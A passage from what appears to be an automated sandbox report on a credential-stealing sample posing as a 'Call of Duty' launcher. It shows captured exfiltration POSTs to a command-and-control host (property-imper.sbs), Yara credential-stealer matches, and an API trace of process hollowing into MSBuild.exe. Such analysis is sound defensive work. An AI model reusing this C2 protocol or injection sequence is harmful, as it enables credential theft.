cfL4;desc="?proto=TCP&rtt=2546&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2846&recv_bytes=2124&delivery_rate=1133540&cwnd=134&unsent_bytes=0&cid=1ac5cce17ed0b3ac&ts=751&x=0"
2024-11-23 14:06:11 UTC	19	IN	Data Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a Data Ascii: eok 8.46.123.75
2024-11-23 14:06:11 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49736	104.21.33.116	443	7328	C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-23 14:06:13 UTC	282	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=G2MCMEH5ENA9DZQ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 587545 Host: property-imper.sbs
2024-11-23 14:06:13 UTC	15331	OUT	Data Raw: 2d 2d 47 32 4d 43 4d 45 48 35 45 4e 41 39 44 5a 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 44 41 30 37 38 46 44 31 30 37 41 41 33 42 37 43 33 44 39 42 42 44 38 46 42 31 46 42 34 35 33 0d 0a 2d 2d 47 32 4d 43 4d 45 48 35 45 4e 41 39 44 5a 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 47 32 4d 43 4d 45 48 35 45 4e 41 39 44 5a 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 42 56 6e 55 71 6f 2d 2d 40 73 61 73 63 68 6b 61 71 0d 0a 2d 2d 47 Data Ascii: --G2MCMEH5ENA9DZQContent-Disposition: form-data; name="hwid"8DA078FD107AA3B7C3D9BBD8FB1FB453--G2MCMEH5ENA9DZQContent-Disposition: form-data; name="pid"1--G2MCMEH5ENA9DZQContent-Disposition: form-data; name="lid"BVnUqo--@saschkaq--G
2024-11-23 14:06:13 UTC	15331	OUT	Data Raw: e2 4a d6 f5 18 49 bd 7a 8c 8a 9f 15 65 71 f9 73 1f d4 29 b3 63 11 d8 bb aa a2 05 85 28 d1 19 35 f4 2d 4c 00 1c 0e fb 3c 0d 50 b9 8b d2 2e 7b f3 5b 12 8d 73 df dd a6 ad ed 18 90 8f f7 af 40 33 ea e6 ff 0a 8c 88 70 c6 f4 4d 71 4c d2 78 16 9a 84 0c 0b a2 cc 5d 20 2e 3f ad 33 56 e5 30 a6 3f fc 62 ce d8 60 41 02 7c 8b 14 4e 98 10 03 97 a4 33 cc c3 a0 b9 a5 12 9f 7a 3b 19 7f 85 25 bb c8 e3 61 89 55 d2 13 b6 02 de 35 3b 72 d0 f1 51 e2 c4 56 32 ca 38 ae c3 29 26 3a 75 23 cb 22 90 2d ba eb c0 c9 f3 47 5c 6a f8 f6 51 f3 34 9e f0 35 e9 a4 7b 0a da aa 30 7d f1 b7 24 81 62 d8 7c b3 23 04 b7 1f f7 77 0e c8 1a 2e 78 ee 3d 69 f1 cb 7f ac f6 0c 06 a8 fc ae c9 60 17 61 16 ad ec 83 d2 b7 c6 ca 27 a5 00 02 9d 87 92 19 77 0e 25 4b 00 c5 1f 50 46 3d cc 38 e1 ca 74 15 02 a7 0f Data Ascii: JIzeqs)c(5-L<P.{[s@3pMqLx] .?3V0?b`A\|N3z;%aU5;rQV28)&:u#"-G\jQ45{0}$b\|#w.x=i`a'w%KPF=8t
2024-11-23 14:06:13 UTC	15331	OUT	Data Raw: bb 4f 76 b5 a9 1a a1 db ef c8 f8 e0 38 2c 8e 2b 44 68 95 04 17 7b ca 32 ad 31 b5 6e 54 d8 34 4e d8 b4 32 af 95 5c 6b ac 86 19 35 38 ae 17 67 fc 6f cf 32 ad 39 dc 26 7c f6 b5 4d 6e ae 38 44 dd 41 88 97 8c 9a dc 8e ba f1 78 2a 62 f9 c9 48 c9 93 1b 55 fd 43 b7 06 68 65 53 6c 72 bb 94 a0 97 24 38 db 3b b8 2e 77 64 ea 2c 4f 23 1e 3e fd d0 9d e5 2d 01 98 5b 8a 95 fd 25 bc 43 eb ec da 6b 10 41 97 51 d3 fb c8 bc 53 90 59 d8 6a 52 0e 65 bf a2 3f f2 61 3e 32 b0 f6 5f d1 62 08 00 19 4f dc b8 17 b3 40 00 c4 b2 91 4a 5a c8 93 03 f9 22 f3 f3 10 53 4b 00 34 ff ce 5e 90 ca 39 f2 fb 5d ec 02 aa 68 3a d2 89 8a e5 61 2d 62 9f 87 d2 28 02 55 71 7a 7d 18 80 5a ea 98 ca f2 e7 ed 9b 59 7f e3 c9 37 5e 2e d7 02 04 af 92 ce 02 b3 bd d4 1c ac 9e 2e be bd 21 52 f2 f7 b3 ac fc 94 90 Data Ascii: Ov8,+Dh{21nT4N2\k58go29&\|Mn8DAx*bHUCheSlr$8;.wd,O#>-[%CkAQSYjRe?a>2_bO@JZ"SK4^9]h:a-b(Uqz}ZY7^..!R
2024-11-23 14:06:13 UTC	15331	OUT	Data Raw: 3f 41 25 07 35 47 fb d2 ca f4 98 48 8a 04 ff 41 f5 fd 6b bd c9 81 7c b0 4a 51 a8 cb f9 92 37 fd d1 19 e6 72 ce 96 ab cb ba da 60 15 27 09 3e 38 a9 d7 0f 8a 0c a6 79 c0 da 6f fd 57 e4 f9 11 fe 9f 14 aa 3b 74 82 6c c8 32 23 39 c8 82 69 cf 68 85 34 44 af 0a db 4b 81 4e e4 69 fa ed e7 9d bc 85 9d ce 77 fc 6d 76 4e e4 0e db c6 f4 04 e8 55 a7 a9 c8 27 c2 37 01 28 9f 8e b4 67 cf a7 08 6a d8 7f c5 2b 4b 0a 8b f7 89 3b c5 1a 23 ff b1 b6 65 ed 47 47 ca fe 5a 94 e3 33 b3 2f df b7 e1 db 65 9c 40 b1 eb 36 8b 6f ad 56 6f 7a 27 58 6e fc b5 e7 eb 48 53 99 db 49 76 ac 5b b7 0d 93 9b c6 7a be d0 92 aa 00 d2 3a f2 e3 9c 90 0c 1f 90 88 c9 1f 57 d9 8d f6 c0 0b 47 e4 84 5c e6 f9 03 4e 82 02 16 ef ec 61 a3 5e 09 70 dc f4 cb e7 40 e0 17 66 bb a7 7f f6 34 c0 e4 7a 0c c6 cf bd bf Data Ascii: ?A%5GHAk\|JQ7r`'>8yoW;tl2#9ih4DKNiwmvNU'7(gj+K;#eGGZ3/e@6oVoz'XnHSIv[z:WG\Na^p@f4z
2024-11-23 14:06:13 UTC	15331	OUT	Data Raw: 82 7c 6e 6c e5 bb 81 c7 04 07 4c 91 9f 49 88 dc 46 76 4d 6b b1 1e 27 7b 88 87 5b 02 cb 42 79 82 1c 94 9f 3d 71 a8 0b 1b 42 9d b8 57 d1 2f 9b 1c 19 87 0d bb 44 ca 4e 23 7f 10 d5 29 bb 2b de ad 2c d8 a0 e9 d0 f8 20 ef 59 8a 8d 5b 41 25 9f f0 e0 0f d1 36 ca c7 a8 93 6e cf 43 f8 87 f7 09 e1 0f e6 4e 70 b5 59 68 17 74 71 34 4b cd c2 ae a2 66 8f e2 d7 79 3f d7 8f 33 79 47 a5 3c c1 07 04 82 12 2c 24 20 07 64 70 5c ec 28 b3 e3 76 07 87 fa eb 06 f7 cf 10 97 5f 62 d0 94 0c c7 7c 8a 47 b9 73 96 00 09 8d 2c 41 80 82 10 70 1b b0 ed 77 ac 8e d2 79 63 19 c2 ff 56 10 d3 78 40 8e 25 55 fb ef 52 e2 2a 35 36 6e b9 c2 fe 0a 6b 07 02 59 b3 a0 44 5a 9b 7c 8d 1d df d9 70 3b 7a e1 1b 1f e8 43 06 3c d8 2c 93 06 5e 2f d8 33 fc 19 27 fb 3f 54 4e e3 11 d7 01 9b a0 20 5a 20 f7 93 27 Data Ascii: \|nlLIFvMk'{[By=qBW/DN#)+, Y[A%6nCNpYhtq4Kfy?3yG<,$ dp\(v_b\|Gs,ApwycVx@%UR*56nkYDZ\|p;zC<,^/3'?TN Z '
2024-11-23 14:06:13 UTC	15331	OUT	Data Raw: 34 5f 17 01 8c 3a 28 bd 41 7e 14 d7 c2 5c 8a f2 a8 e3 48 55 ed d3 cc d4 5a 45 8b 0a 45 2c 3a 0d 01 da 05 78 38 c6 44 24 18 2d 91 72 8f ba a7 4f 2d bc eb 56 02 cc d3 f0 fd 1f 83 e4 b1 db 25 d3 1b 52 62 79 a1 8b a4 77 c4 fc b4 c7 6c 63 ea 6e 7c 8d 56 7f 85 af db da d6 6c 91 99 c3 31 ef 7b 81 35 5c fb 52 bf 8e 28 8f 1e ef 0f c7 ab 0f 72 fe 2e 65 cd 49 23 b9 f5 37 4f 84 d6 dd 2e a0 36 cd b4 e6 39 0f ed 05 f4 56 fd 88 09 ba 02 91 9e c9 5b 7a 9a d1 86 62 7f 8b e5 32 9a 4d 6a e6 d2 8d f4 eb 8a 06 f8 7e 7f 45 83 92 2f c4 84 c1 2c 11 b2 12 7a 0a cb c4 12 f2 c7 22 38 13 68 be 8b 57 9f a6 f9 dc 3d 55 3c 20 f6 20 92 59 72 dd 6d 0f e5 df c2 3e 9d 77 b2 3e c0 56 18 87 c5 c2 23 05 c1 3a 4b 3c 3c b5 7d 82 ec 9b 62 42 71 11 3f 77 1d 80 72 07 d9 9f f0 5f 4e 2c 6e 56 4f c3 Data Ascii: 4_:(A~\HUZEE,:x8D$-rO-V%Rbywlcn\|Vl1{5\R(r.eI#7O.69V[zb2Mj~E/,z"8hW=U< Yrm>w>V#:K<<}bBq?wr_N,nVO
2024-11-23 14:06:13 UTC	15331	OUT	Data Raw: a0 96 ba b0 5a 2f 14 66 d8 b9 e3 6d 92 d1 ed fb 71 15 d8 26 17 e7 d3 69 e4 94 25 cb 49 d6 15 b7 da 37 86 5d 2a f4 dc 25 03 ce 6f 2c 47 46 07 a9 1c 7b 47 6b 7c 11 b5 d1 b1 99 b7 40 32 31 0e 7f 39 05 d0 31 2a a0 8b a9 11 13 10 65 e4 cd 78 81 4a a1 14 9b cf 80 2e c6 14 10 3c 0a 1c 52 b3 e0 81 20 68 ba ca 99 9a 52 99 b3 8e cb 36 31 32 cc 13 a2 a9 02 32 64 48 23 21 c9 05 1d 08 db bb ae c4 6f 26 3e 01 f7 18 b6 68 13 62 f3 4f c2 a4 d8 e9 f1 5a 71 40 84 32 a3 43 e2 df 2b 96 f6 1a 1b 45 19 09 f0 80 80 f2 82 56 c3 9b 1f b5 c7 90 a7 b5 b3 4c c8 19 b3 ee b9 0d 31 f1 78 56 b0 c5 40 d4 90 e2 37 cd 9f 62 04 93 da 5d fd d5 ed 28 6d 18 4f a2 7b 91 64 9a 21 06 b2 7d 13 3e 65 b4 77 16 f9 59 96 9c 99 30 fa b2 d0 34 6c 47 09 40 60 d4 0e c5 08 9c 48 96 00 f6 53 79 42 0d b2 22 Data Ascii: Z/fmq&i%I7]%o,GF{Gk\|@2191exJ.<R hR6122dH#!o&>hbOZq@2C+EVL1xV@7b](mO{d!}>ewY04lG@`HSyB"
2024-11-23 14:06:13 UTC	15331	OUT	Data Raw: b1 20 ec cb 3d bb cd c4 ba a1 8f 50 60 9e 93 4d 05 4a c6 dd b1 f8 39 b4 a3 97 b5 50 87 6f 3f fd ec 5e 82 42 cc 16 dd 75 61 d8 ee 4b ed e3 92 27 6d dc ef ff 20 a5 91 84 cc ea d3 99 a1 07 b2 f8 9b 46 f7 e5 36 b8 21 21 1f 5e 06 7f 50 97 fa 66 4b 50 ad 7e 1b 77 0c f5 85 21 c0 f9 72 68 b3 60 6f e6 01 53 e9 20 a3 d5 db ec 41 ac 38 69 51 df d2 93 cb 7e bf 17 65 d0 d0 28 67 f9 bd 24 63 f8 81 fb de 91 ff 26 eb 36 4f 66 72 2a 43 79 58 e1 ef 9e 71 4e f4 87 e1 73 9f c3 26 7e 8c 86 57 1f f4 b1 1c b1 0d 53 ea 9d 5c f8 85 03 88 3d 9b 65 46 4b f7 c7 64 db c6 15 23 26 2d 9d 32 da 82 27 6f 6c 1e 60 9c aa e1 96 32 f4 96 ca ab ab a9 a3 4c 40 3e 9e 6d 38 15 56 c3 ec e3 0e d6 0f 87 b7 1e f8 ed 94 ac f6 64 96 5a 7b 2a 44 88 f4 bd 5a b8 d9 dd 70 d3 7f 73 15 ad 89 a3 05 0d 26 8d Data Ascii: =P`MJ9Po?^BuaK'm F6!!^PfKP~w!rh`oS A8iQ~e(g$c&6OfrCyXqNs&~WS\=eFKd#&-2'ol`2L@>m8VdZ{DZps&
2024-11-23 14:06:13 UTC	15331	OUT	Data Raw: 2a 46 67 ad e7 86 22 f5 03 28 ea 97 65 b4 47 20 aa ad f6 12 67 00 91 bb ca 18 ed f1 e4 aa ab 80 38 5a b8 97 f3 f8 ef 18 1a 2a c2 20 09 6e b9 36 ae 55 c5 7a 0b 5a 49 b6 10 e0 5d 0f b2 ea 22 5c a4 eb 69 25 6b e2 19 c9 2f 6f b0 5e f0 15 5d 34 4d 5d 62 bf d3 ac d3 43 cc e8 fd 72 a6 80 30 69 d6 de 51 ee 33 51 7b 35 bd e6 32 52 e8 8f 52 51 6a 5f a7 c5 61 97 ce f9 f3 1c 76 05 03 33 5f c9 f8 cd cf 06 e4 7a ba f6 e4 d7 a5 d3 43 e6 37 3f 06 5f b5 22 b2 d6 a5 22 9d 0b 32 cd e8 52 d0 6f 36 29 01 b3 a9 53 64 0a bf 1f 3f aa 58 19 1d 9e 06 b9 75 29 54 0d 86 0f fe 80 34 90 ed b5 77 8b 39 d4 d3 9a 71 a1 f8 6a ca 17 28 8f 61 2d 07 47 21 f8 c4 f0 35 33 0d 5c 1c 3c 19 e3 fb 13 91 16 09 7b 70 3a ec 35 72 aa 94 38 45 36 36 ac b5 73 30 0f f8 be de a0 5d ca c6 22 cf 81 27 07 29 Data Ascii: Fg"(eG g8Z n6UzZI]"\i%k/o^]4M]bCr0iQ3Q{52RRQj_av3_zC7?_""2Ro6)Sd?Xu)T4w9qj(a-G!53\<{p:5r8E66s0]"')
2024-11-23 14:06:13 UTC	15331	OUT	Data Raw: f4 ec 23 69 2a 0b 63 1d e0 34 b2 27 30 fc 49 39 ad 66 84 63 9f 6f 38 80 43 f7 fb 7f 83 ca a6 4b cd 2f c5 db 57 13 0b 87 f0 b2 91 c5 45 4f f6 a0 58 92 5b 7b 1b 91 75 07 8e 85 bc 21 89 86 74 3f a4 2d 0c e4 3e a6 14 8d ee 59 b6 c1 cf b7 42 b5 0f bd 06 df 54 b1 1a ae 65 86 d4 65 76 81 ee be 83 cf aa 5d 86 40 58 37 01 03 26 22 27 67 1f f2 0b 1a 01 83 4f 5f 79 bb 04 ea 02 8e d9 2f cd e9 d4 87 cb 91 4b 73 08 5f 62 5d f5 b2 78 5b 79 cc 33 1c bc 65 d7 e1 aa 58 c5 ce b7 b5 0f 42 87 42 98 79 bb 79 4e 30 cc ed 32 fd d7 ae 60 fa 7f 25 29 41 d5 4d a4 12 e8 68 a5 24 6a ae 41 1f da aa 99 26 21 8c f8 a0 ad 8a da 39 56 ab d0 bc fa cf ed e6 53 5f bd 55 10 f1 52 f4 d2 ce 75 d8 8f f7 92 5c 91 55 7f 44 fc d2 1f 88 13 9a 71 e1 52 40 36 cb 71 42 fe 09 83 b5 31 d2 aa 30 5b 81 51 Data Ascii: #i*c4'0I9fco8CK/WEOX[{u!t?->YBTeev]@X7&"'gO_y/Ks_b]x[y3eXBByyN02`%)AMh$jA&!9VS_URu\UDqR@6qB10[Q
2024-11-23 14:06:16 UTC	1021	IN	HTTP/1.1 200 OK Date: Sat, 23 Nov 2024 14:06:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=p305vhth6l2rkgvglhde7dc3it; expires=Wed, 19-Mar-2025 07:52:54 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Df3LDfEeOZCaPV0tO%2F36KVGwR%2Bbk3A6AALyo5whhfgOv00GBVZOGcA8wCBeZ3cPFOHVFps5RW7L2jbAPn6FccbHj6EjxshSWZp9YXJZaXaN5%2Fsck6pukCv64NzzMyzAzmNGhA6k%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e71b7f8e88c435d-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1755&sent=351&recv=612&lost=0&retrans=0&sent_bytes=2845&recv_bytes=590135&delivery_rate=1606160&cwnd=128&unsent_bytes=0&cid=cbfab3e7a3453f27&ts=2811&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49738	104.21.33.116	443	7328	C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-23 14:06:17 UTC	266	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 86 Host: property-imper.sbs
2024-11-23 14:06:17 UTC	86	OUT	Data Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 42 56 6e 55 71 6f 2d 2d 40 73 61 73 63 68 6b 61 71 26 6a 3d 26 68 77 69 64 3d 38 44 41 30 37 38 46 44 31 30 37 41 41 33 42 37 43 33 44 39 42 42 44 38 46 42 31 46 42 34 35 33 Data Ascii: act=get_message&ver=4.0&lid=BVnUqo--@saschkaq&j=&hwid=8DA078FD107AA3B7C3D9BBD8FB1FB453
2024-11-23 14:06:18 UTC	1027	IN	HTTP/1.1 200 OK Date: Sat, 23 Nov 2024 14:06:18 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=ki7cue64o6tvu2j2kre9lc11lc; expires=Wed, 19-Mar-2025 07:52:57 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qakj7UN7Wjk34m%2FZmHn%2BoDD1t4WEbLtUM16uw%2BgyTu%2FM9B%2F%2FOftbMQK3TKuiR1ilW4kUq1wivao618PNMFFoCki%2FnD%2FUhXYnY7Nr4OwhonXeOxDpnHOFP1ZGAc%2FXys1%2FQbfuaXk%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e71b812cd72c475-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1681&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2846&recv_bytes=988&delivery_rate=1691772&cwnd=177&unsent_bytes=0&cid=9d0f2c9e0fc50d1f&ts=708&x=0"
2024-11-23 14:06:18 UTC	126	IN	Data Raw: 37 38 0d 0a 51 77 33 42 7a 52 44 48 45 5a 7a 37 56 44 47 6f 4e 55 33 5a 74 42 44 68 34 59 70 62 4c 66 77 74 65 63 75 2f 68 68 2b 2f 4b 37 73 59 64 75 4f 34 4d 76 30 7a 39 49 38 67 51 5a 4a 70 59 6f 57 62 49 64 58 57 70 47 38 59 30 68 6c 4f 35 59 65 33 51 35 42 49 31 43 31 6c 72 72 35 6b 36 58 54 6b 6e 6e 59 64 69 6c 4d 35 2b 34 34 67 7a 63 50 76 65 52 66 4d 55 43 51 3d 0d 0a Data Ascii: 78Qw3BzRDHEZz7VDGoNU3ZtBDh4YpbLfwtecu/hh+/K7sYduO4Mv0z9I8gQZJpYoWbIdXWpG8Y0hlO5Ye3Q5BI1C1lrr5k6XTknnYdilM5+44gzcPveRfMUCQ=
2024-11-23 14:06:18 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Target ID:	0
Start time:	09:05:56
Start date:	23/11/2024
Path:	C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe"
Imagebase:	0x6b0000
File size:	495'616 bytes
MD5 hash:	FAD119B9DB79CCBFE3A65A13F0822B22
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	09:05:56
Start date:	23/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	09:05:57
Start date:	23/11/2024
Path:	C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe"
Imagebase:	0x6b0000
File size:	495'616 bytes
MD5 hash:	FAD119B9DB79CCBFE3A65A13F0822B22
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000003.1711652873.00000000035F3000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000003.1756574371.00000000035E4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000003.1711171222.00000000035E4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	4%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	3.5%
Total number of Nodes:	1663
Total number of Limit Nodes:	24

Executed Functions

Function 006DB18D Relevance: 42.3, APIs: 10, Strings: 14, Instructions: 295
threadinjectionmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessW.KERNELBASE(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,006DB0FF,006DB0EF), ref: 006DB323
VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 006DB336
Wow64GetThreadContext.KERNEL32(00000098,00000000), ref: 006DB354
ReadProcessMemory.KERNELBASE(00000094,?,006DB143,00000004,00000000), ref: 006DB378
VirtualAllocEx.KERNELBASE(00000094,?,?,00003000,00000040), ref: 006DB3A3
WriteProcessMemory.KERNELBASE(00000094,00000000,?,?,00000000,?), ref: 006DB3FB
WriteProcessMemory.KERNELBASE(00000094,00400000,?,?,00000000,?,00000028), ref: 006DB446
WriteProcessMemory.KERNELBASE(00000094,?,?,00000004,00000000), ref: 006DB484
Wow64SetThreadContext.KERNEL32(00000098,031F0000), ref: 006DB4C0
ResumeThread.KERNELBASE(00000098), ref: 006DB4CF

Strings

ResumeThread, xrefs: 006DB2C7
WriteProcessMemory, xrefs: 006DB29E
ress, xrefs: 006DB215
SetThreadContext, xrefs: 006DB2B1
Load, xrefs: 006DB1C9
GetThreadContext, xrefs: 006DB265
VirtualAlloc, xrefs: 006DB252
GetP, xrefs: 006DB20D
TerminateProcess, xrefs: 006DB3B2
aryA, xrefs: 006DB1D1
ReadProcessMemory, xrefs: 006DB278
VirtualAllocEx, xrefs: 006DB28B
CreateProcessW, xrefs: 006DB23F
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, xrefs: 006DB322

Memory Dump Source

Source File: 00000000.00000002.1663510366.00000000006DB000.00000040.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true

Associated: 00000000.00000002.1663438527.00000000006B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663459365.00000000006B1000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663487737.00000000006D3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663530565.00000000006DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663548215.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663571723.00000000006E1000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6b0000_Call 0f Duty A1 Launcher.jbxd

Similarity

API ID: Process$Memory$ThreadWrite$AllocContextVirtualWow64$CreateReadResume
String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe$CreateProcessW$GetP$GetThreadContext$Load$ReadProcessMemory$ResumeThread$SetThreadContext$TerminateProcess$VirtualAlloc$VirtualAllocEx$WriteProcessMemory$aryA$ress
API String ID: 2687962208-3857624555
Opcode ID: 4d4c1a7e65f8d0d38951af6025ef960edc15c7aa7ffa2998c2434409f37e51df
Instruction ID: 0e5c911ca2c0eb564ce94fb0ce59fac31897ca87ed5711d5ae8e5ea6db8e179e
Opcode Fuzzy Hash: 4d4c1a7e65f8d0d38951af6025ef960edc15c7aa7ffa2998c2434409f37e51df
Instruction Fuzzy Hash: ACB1F77660064AEFDB60CF68CC80BDA73A5FF88714F168525EA08AB345D770FA51CB94

Function 006BCD10 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1663459365.00000000006B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true

Associated: 00000000.00000002.1663438527.00000000006B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663487737.00000000006D3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663510366.00000000006DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663530565.00000000006DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663548215.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663571723.00000000006E1000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6b0000_Call 0f Duty A1 Launcher.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8652d58fb1d9cddebc248ef8a056a777e83e2e39abab3dc9b0924062e89607ee
Instruction ID: 01e29318ad48eb90c24fe06615d0f1df8025886c3e3e50684888091a3c07d83c
Opcode Fuzzy Hash: 8652d58fb1d9cddebc248ef8a056a777e83e2e39abab3dc9b0924062e89607ee
Instruction Fuzzy Hash: 690119749042088FC754DF68D885BD9F7F0EB18710F0185ADA88897340EB74AA84CF85

Function 006C9DD3 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FreeLibrary.KERNEL32(00000000,?,00000000,00000800,00000000,?,?,C362B542,?,006C9EE2,?,?,00000000), ref: 006C9E94

Strings

api-ms-, xrefs: 006C9E2A
ext-ms-, xrefs: 006C9E3E

Memory Dump Source

Source File: 00000000.00000002.1663459365.00000000006B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true

Associated: 00000000.00000002.1663438527.00000000006B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663487737.00000000006D3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663510366.00000000006DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663530565.00000000006DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663548215.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663571723.00000000006E1000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6b0000_Call 0f Duty A1 Launcher.jbxd

Similarity

API ID: FreeLibrary
String ID: api-ms-$ext-ms-
API String ID: 3664257935-537541572
Opcode ID: 04175c34c7f44948e6a704401c39e831d9dcf5a439a291983e87316c3f8d7a13
Instruction ID: 589b79a4d90eb2710e1a7d2662be3f0103cbb116253530096fb13e8f4e42b0b8
Opcode Fuzzy Hash: 04175c34c7f44948e6a704401c39e831d9dcf5a439a291983e87316c3f8d7a13
Instruction Fuzzy Hash: 0C21C331E02211ABC721DB649C49FAA375BEFA5760F25112AE906A7391DB30ED01C6F0

Function 006BBEB0 Relevance: 9.2, APIs: 6, Instructions: 173
fileCOMMON

Download Yara Rule

Control-flow Graph

